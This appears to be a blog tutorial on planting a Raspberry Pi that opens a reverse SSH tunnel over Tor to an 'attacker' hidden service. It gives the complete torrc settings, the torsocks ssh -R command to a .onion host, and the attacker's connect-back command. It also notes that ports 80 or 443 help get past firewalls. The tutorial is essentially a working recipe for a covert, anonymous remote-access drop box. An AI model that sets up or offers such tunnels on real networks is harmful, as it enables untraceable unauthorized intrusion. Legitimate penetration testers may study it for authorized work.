Tor Remote Reverse-SSH Tunnel

Last modified: 17 January 2019

How to use TOR hidden service with SSH remote tunnel and how to use hidden service as an anonymous SSH proxy.

We will set a remote ssh tunnel from a raspi client towards a hidden service, accessible by an attacker.

Prerequisites:

Example:

  • user pi on the Raspberry.
  • user lobs on the Attacker Server.
  • SSH server running on both.
  • TOR server running on both.
  • torsocks installed on raspi.

Torsocks allows you to use most applications in a safe way with Tor. It ensures that DNS requests are handled safely and explicitly rejects any traffic other than TCP from the application you’re using.

TOR Hidden Service setup

On the attacker machine it is needed to setup a Hidden Service exposing itself to the whole TOR network. The service will expose the local ssh server needed to allow the raspi box to reverse ssh into it.

Edit the /etc/tor/torrc file and modify these lines:

HiddenServiceDir /var/lib/tor/hidden_service/
HiddenServicePort 30022 127.0.0.1:22

where 30022 is the port open to the TOR network redirecting traffic to 127.0.0.1 port 22.

For further client authorization look at the HiddenServiceAuthorizeClient directive.

Then save and restart Tor. It will create the material needed to the hidden service in the hidden_service folder. The last thing you need is the hostname which will refer to the hidden service located under /var/lib/tor/hidden_service/hostname.

For example: irpqznciwifhpqgd.onion

Change also the file /etc/tor/torsocks.conf the line:

AllowOutboundLocalhost 1

This is needed to torsocks

From the Raspberry:

  • Copy the RSA key to the Server with:
    $ ssh-copy-id -i .ssh/id_rsa.pub lobs@AttackerServer.domain
    

    If id_rsa.pub doesn’t already exists then:

    $ ssh-keygen
    
  • The command to launch is:
    $ torsocks ssh -p 30022 -N -R 2222:localhost:22 pi@irpqznciwifhpqgd.onion
    

This will use torsocks to ssh the Raspberry to the Attacker Hidden Service without specifying any command (-N) and tell the server to redirect ssh connection from local (server) port 2222 to remote (raspberry) port 22 (or whatever you want).

After that, on the Attacker Server there will be a ssh socket listening on port 2222 ready to redirect ssh traffic to tor to Raspberry through port 22.

You can always set up the raspberry to serve ssh connections on port 80 or 443 in order to avoid firewall issues. It depends on the firewall configurations.

The Attacker

The attacker just need to:

  1. SSH into his server on port 30022.
  2. Run the command:
    $ ssh -p 2222 -l lobs localhost
    

The localhost listening service is automatically routing traffic to the TOR network. This means no loss of anonymity for both the client and the server.

attacker <—> TOR <—> HiddenService <—–> TOR <—-> client

Considerations

This way if the Raspberry falls under someone’s else hands it has full access on the AttackerServer. If it has served its aim then you should remove the RSA key from the authorized_key on the server or just destroy the HiddenService.

Please feel free to make any comment! If anything is unclear, just write in the comment and I will update the post!Thanks for reading!